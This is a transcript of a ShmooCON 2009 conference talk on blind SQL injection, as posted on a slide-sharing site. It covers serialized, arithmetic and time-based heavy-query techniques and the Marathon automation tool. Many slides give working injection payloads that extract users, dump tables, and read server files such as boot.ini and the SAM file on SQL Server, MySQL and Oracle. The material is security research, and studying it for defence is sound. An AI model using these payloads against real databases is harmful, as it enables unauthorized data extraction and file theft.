Downloaded 35 times
![Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)
– Id=A+(1/(ASCII(B)-C))
•A-> Param value originally used in the query.
•B -> Value we are searching for, e.g.:
Substring(passwd,1,1)
•C-> Counter [0..255]
– When ASCII(B)=C, the DB will generate a divide by
zero exception.](https://image.slidesharecdn.com/chemaalonso-palako-replayingblindsqli-140520002851-phpapp02/85/ShmooCON-2009-Re-playing-with-Blind-SQL-Injection-17-320.jpg)
![Arithmetic Blind SQL Injection
• Sums and subtractions
– Id=A+ASCII(B)-C
•A-> Param value originally used in the query.
•B -> Value we are searching for, e.g.:
Substring(passwd,1,1)
•C-> Counter [0..255]
– When ASCII(B)=C, then the response page of
id=A+ASCII(B)-C will be the same as id=A](https://image.slidesharecdn.com/chemaalonso-palako-replayingblindsqli-140520002851-phpapp02/85/ShmooCON-2009-Re-playing-with-Blind-SQL-Injection-18-320.jpg)
![Arithmetic Blind SQL Injection
• Value type overflow
– Id=A+((C/ASCII(B))*(K))
•A-> Param value originally used in the query.
•B -> Value we are searching for, e.g.:
Substring(passwd,1,1)
•C-> Counter [0..255]
•K-> Value that overflows the type defined for A
–(e.g. if A is integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type](https://image.slidesharecdn.com/chemaalonso-palako-replayingblindsqli-140520002851-phpapp02/85/ShmooCON-2009-Re-playing-with-Blind-SQL-Injection-19-320.jpg)
Uploaded byChema Alonso
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
The document discusses various SQL injection techniques, including serialized and arithmetic SQL injection, as well as methods for downloading files and performing time-based blind SQL injections. It includes demonstrations for extracting data using complex queries and highlights the importance of query sanitization to prevent such attacks. The document also introduces a tool named 'Marathon' that automates these time-based blind SQL injection attacks across different database engines.
More Related Content
![[Kerference] Nefarious SQL - 김동호(KERT)](https://cdn.slidesharecdn.com/ss_thumbnails/nefarioussql-160725061743-thumbnail.jpg?width=640&height=640&fit=bounds)
Similar to ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
- 1. (Re) Playing with(Blind) SQL Injection José Palazón “Palako” Mobile Security at Yahoo! Chema Alonso Informatica64 Microsoft MVP Enterprise Security
- 2. Spain (…not onlybulls…)
- 3. SQL Injection attacks http://www.phrack.org/issues.html?id=8&issue=54 Along time ago, in a galaxy far, far away…
- 4. Agenda • Serialized SQLInjection – Demo: XML Extractor • Arithmetic SQL Injection – Divide by Zero – Sums and subtractions – Type oveflow – Demo • Remote File Downloading using Blind SQL Injection – SQL Sever – MySQL – Oracle – Demo: RFD Tool • Time-Based Blind SQL Injection using heavy queries – Demo: Marathon Tool
- 5.
- 6. Serialized SQL Injection •Goal: To Merge complex resultsets in a single showable field • XML serialization functions allow to convert a resultset into a one XML string. • It´s possible to download big amount of data with single and simple injections.
- 7. SQL Server • FORXML: Retrieves data as a single string representing an XML tree. • RAW: Mandatory option. Shows the information converting each row of the result set in an XML element in the form <row />. • BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified. – union select '1','2','3',(select * from sysusers for xml raw, binary base64) • XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints. – Described by Dani Kachakil
- 8. MySQL • No defaultXML support, requires a server side extension • GROUP_CONCAT (v 4.1+)
- 9. Oracle • xmlforest, xmlelement,… •No * support
- 10. Demo: Serialized SQLInjection
- 11. Arithmetic Blind SQLInjection
- 12. Blind Attacks • Attackerinjects code but can´t access directly to the data. • However this injection changes the behavior of the web application. • Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. – Blind SQL Injection – Biind Xpath Injection – Blind LDAP Injection
- 13. Blind SQL InjectionAttacks • Attacker injects: – “True where clauses” – “False where clauses“ – Ex: • Program.php?id=1 and 1=1 • Program.php?id=1 and 1=2 • Program doesn’t return any visible data from database or data in error messages. • The attacker can´t see any data extracted from the database.
- 14. Blind SQL InjectionAttacks • Attacker analyzes the response pages looking for differences between “True-Answer Page” and “False-Answer Page”: – Different hashes – Different html structure – Different patterns (keywords) – Different linear ASCII sums – “Different behavior” • By example: Response Time
- 15. Blind SQL InjectionAttacks • If any difference exists, then: – Attacker can extract all information from database – How? Using “booleanization” • MySQL: – Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) » “True-Answer Page” or “False-Answer Page”? • MSSQL: – Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) • Oracle: – Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1)
- 16. Arithmetic Blind SQLInjection • The query force the parameter to be numeric – SELECT field FROM table WHERE id=abs(param) • Boolean logic is created with math operations – Divide by zero – Sums and subtractions – Type overflows
- 17. Arithmetic Blind SQLInjection • Divide by zero (David Litchfield) – Id=A+(1/(ASCII(B)-C)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, the DB will generate a divide by zero exception.
- 18. Arithmetic Blind SQLInjection • Sums and subtractions – Id=A+ASCII(B)-C •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] – When ASCII(B)=C, then the response page of id=A+ASCII(B)-C will be the same as id=A
- 19. Arithmetic Blind SQLInjection • Value type overflow – Id=A+((C/ASCII(B))*(K)) •A-> Param value originally used in the query. •B -> Value we are searching for, e.g.: Substring(passwd,1,1) •C-> Counter [0..255] •K-> Value that overflows the type defined for A –(e.g. if A is integer, then K=2^32) – When C/ASCII(B)==1, K*1 overflows the data type
- 20. Demo: • Divide byzero • Sums and subtractions • Integer overflow
- 21. Remote File Downloadingusing Blind SQL Injection techniques
- 22. Accessing Files • Twoways: – Load the file in a temp table • and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ?? – Load the file in the query • With every query the file is loaded in memory • I am very sorry, engine • and i>ASCII(Substring(load_file(file,pos,1))??
- 23. SQL Server 2K- External Data Sources • Only for known filetypes: – Access trough Drivers: Txt, csv, xls, mdb, log – And 200>ASCII (SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:dirtarget.txt’),1,1)) • Privileges – HKEY_LOCAL_MACHINESOFTWAREMicrosoftMSSQLServerProvidersDisall owAdhocAccess=0 – By default this key doesn´t exist so only users with Server Admin Role can use these functions. • NTFS permissions
- 24. SQL Server 2K– Bulk option • Access to any file – ; Create Table TempTable as (row varchar(8000)) -- – ; Bulk Insert TempTable From 'c:file.ext' With (FIELDTERMINATOR = 'n', ROWTERMINATOR = 'n‘) -- – ; alter table TempTable add num int IDENTITY(1,1) NOT NULL – – and (select COUNT(row) from TempTable) – and (select top 1 len(row) from TempTable where num = rownum) – and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1) – ; Drop Table TempTable-- • Privileges needed – Server Role: Bulkadmin – Database Role: db_owner o db_ddladmin • NTFS permissions
- 25. SQL Server 2k5– 2k8 • OPENDATASOURCE and OPENROWSET supported • Bulk options improved – AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:windowsrepairsam', SINGLE_BLOB) As Data), 1, 1))— • Permisions • Bulkadmin Server Role • External Data Sources enabled • Sp_configure • Surface configuration Tool for features
- 26. MySQL • LoadFile – SELECTLOAD_FILE(0x633A5C626F6F742E696E69) • SQLbfTools: MySQLget command (illo and dab) • http://www.reversing.org/node/view/11 • Load Data infile – ; Create table C8DFC643 (datos varchar(4000)) – ; Load data infile 'c:boot.ini' into table C8DFC643 – ; alter table C8DFC643 add column num integer auto_increment unique key – and (select count(num) from C8DFC643) – and (select length(datos) from C8DFC643 where num = 1) – and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1) – ; Drop table C8DFC643
- 27. Oracle – PlainText files • External Tables – ; execute immediate 'Create Directory A4A9308C As ''c:'' '; end; -- – ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;-- – Only Plain Text files
- 28. Oracle – DBMS_LOB ;execute immediate ‘ DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;‘ ; end; --
- 29.
- 30. Time-based Blind SQLInjection using heavy queries
- 31. Time-Based Blind SQLInjection • In scenarios with no differences between “True- Answer Page” and “False-Answer Page”, time delays can be used. • Injection forces a delay in the response page when the condition injected is True. - Delay functions: • SQL Server: waitfor • Oracle: dbms_lock.sleep • MySQL: sleep or Benchmark Function • Postgres: pg_sleep – Ex: • ; if (exists(select * from users)) waitfor delay '0:0:5’
- 32. Exploit for SolarEmpire Web Game
- 33. Deep Blind SQLInjection • Time delay depends on the wanted value. • E.g. “a”->10s. delay, “b”->11s. Delay, … • http://labs.portcullis.co.uk/application/deep-blind-
- 34. Time-Based Blind SQLInjection • What about databases engines without delay functions, i.e., MS Access, Oracle connection without PL/SQL support, DB2, etc…? • Can we still perform an exploitation of Time- Based Blind SQL Injection Attacks?
- 35.
- 36. “Where-Clause” execution order Select“whatever “ From whatever Where condition1 and condition2 - Condition1 lasts 10 seconds - Condition2 lasts 100 seconds Which condition should be executed first?
- 37. The heavy conditionfirst Condition2 (100 sec) Condition1 (10 sec) Condition2 & condition1 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 100 sec
- 38. The light conditionfirst Condition1 (10 sec) Condition2 (100 sec) Condition1 & condition2 Response Time TRUE FALSE FALSE 110 sec TRUE TRUE TRUE 110 sec FALSE Not evaluated FALSE 10 sec
- 39. Time-Based Blind SQLInjection using Heavy Queries • Attacker can perform an exploitation delaying the “True-answer page” using a heavy query. • It depends on how the database engine evaluates the where clauses in the query. • There are two types of database engines: – Databases without optimization process – Databases with optimization process
- 40. Time-Based Blind SQLInjection using Heavy Queries • Attacker could inject a heavy Cross-Join condition for delaying the response page in True-Injections. • The Cross-join injection must be heavier than the other condition. • Attacker only have to know or to guess the name of a table with select permission in the database. • Example in MSSQL: – Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
- 41. “Default” tables toconstruct a heavy query – Microsoft SQL Server • sysusers – Oracle • all_users – MySQL (versión 5) • information_schema.columns – Microsoft Access • MSysAccessObjects (97 & 2000 versions) • MSysAccessStorage (2003 & 2007) 41
- 42. “Default” tables toconstruct a heavy query • …or whatever you can guess – Clients – Customers – News – Logins – Users – Providers – ….Use your imagination…
- 43. Ex 1: MSSQL Server Query lasts 14 seconds -> True-Answer
- 44. Ex 1: MSSQL Server • Query lasts 1 second -> False-Answer
- 45. Ex 2: Oracle QueryLasts 22 seconds –> True-Answer
- 46. Ex 2: Oracle QueryLasts 1 second –> False-Answer
- 47. Ex 3: Access2000 Query Lasts 6 seconds –> True-Answer
- 48. Ex 3: Access2000 Query Lasts 1 second –> False-Answer
- 49. Ex 4: Access2007 Query Lasts 39 seconds –> True-Answer
- 50. Ex 4: Access2007 Query Lasts 1 second –> False-Answer
- 51. Marathon Tool • AutomatesTime-Based Blind SQL Injection Attacks using Heavy Queries in SQL Server, MySQL, MS Access and Oracle Databases. • Schema Extraction from known databases • Extract data using heavy queries not matter in which database engine (without schema) • Developed in .NET • Source code available
- 52.
- 53. Prevention: Don´t forget BobbyTables! SANITIZE YOUR QUERIES!
- 54. ¿Preguntas? • Speakers: – ChemaAlonso (chema@informatica64.com) – Palako (palako@lateatral.com) • Autores – Chema Alonso (chema@informatica64.com) – Alejandro Martín (amartin@informatica64.com) – Antonio Guzmán (aguzman@urjc.es) – Daniel Kachakil (dani@kachakil.org) – José Palazón “Palako” (palako@lateatral.com) – Marta Beltran (mberltran@urjc.es)